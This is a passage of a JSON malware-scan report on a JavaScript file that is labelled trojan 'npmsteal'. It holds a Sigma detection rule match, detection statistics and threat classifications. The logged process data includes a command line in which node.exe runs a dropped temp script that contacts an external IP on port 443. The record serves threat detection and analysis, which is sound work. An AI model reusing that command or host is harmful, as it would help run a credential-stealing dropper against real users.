"MessageNumber": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "cbca1653e08da61570de76b640bc3c052d7693b9d8f4232af2317ce235b85eab",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "NodeJS Execution of JavaScript File",
"rule_description": "Detects execution of JavaScript or JSC files using NodeJs binary node.exe, that could be potentially suspicious.\nNode.js is a popular open-source JavaScript runtime that runs code outside browsers and is widely used for both frontend and backend development.\nAdversaries have been observed abusing Node.js to disguise malware as legitimate processes, evade security defenses, and maintain persistence within target systems.\nBecause Node.js is commonly used, this rule may generate false positives in some environments. However, if such activity is unusual in your environment, it is highly suspicious and warrants immediate investigation.\n",
"rule_author": "Swachchhanda Shrawan Poudel (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "MD5=0B7BE00E24F693AD846B1E70848830FD,SHA256=FDDDBF4581E046B8102815D56208D6A248950BB554570B81519A8A5DACFEE95D,IMPHASH=764090509664248D5254CAEEBE1E7AF5",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
"OriginalFileName": "node.exe",
"Product": "Node.js",
"Description": "Node.js JavaScript Runtime",
"FileVersion": "22.20.0",
"ParentCommandLine": "\"C:\\Program Files\\nodejs\\node.exe\" \"C:\\Users\\Bruno\\Desktop\\download.js\"",
"CommandLine": "\"C:\\Program Files\\nodejs\\node.exe\" C:\\Users\\Bruno\\AppData\\Local\\Temp\\0d07ed592d764f2546168524.js 23.254.164.123:443",
"EventID": "1",
"ParentImage": "C:\\Program Files\\nodejs\\node.exe",
"IntegrityLevel": "High",
"Image": "C:\\Program Files\\nodejs\\node.exe",
"Company": "Node.js"
}
}
]
}
],
"last_analysis_stats": {
"malicious": 15,
"suspicious": 0,
"undetected": 43,
"harmless": 0,
"timeout": 0,
"confirmed-timeout": 0,
"failure": 2,
"type-unsupported": 14
},
"javascript_info": {
"tags": [
"write",
"malformed"
]
},
"filecondis": {
"dhash": "fabcbcaa8ed6a4d0",
"raw_md5": "8e0822b0fd0a41673f50da1b3c96f3e2"
},
"first_submission_date": 1780048232,
"popular_threat_classification": {
"popular_threat_category": [
{
"count": 6,
"value": "trojan"
},
{
"count": 2,
"value": "dropper"
},
{
"count": 1,
"value": "downloader"
}
],
"suggested_threat_label": "trojan.npmsteal/abtrojan",
"popular_threat_name": [
{
"count": 4,
"value": "npmsteal"
},
{
"count": 1,
"value": "abtrojan"
},
{
"count": 1,
"value": "aeol"
}
]
},
"type_description": "JavaScript"
}
}
}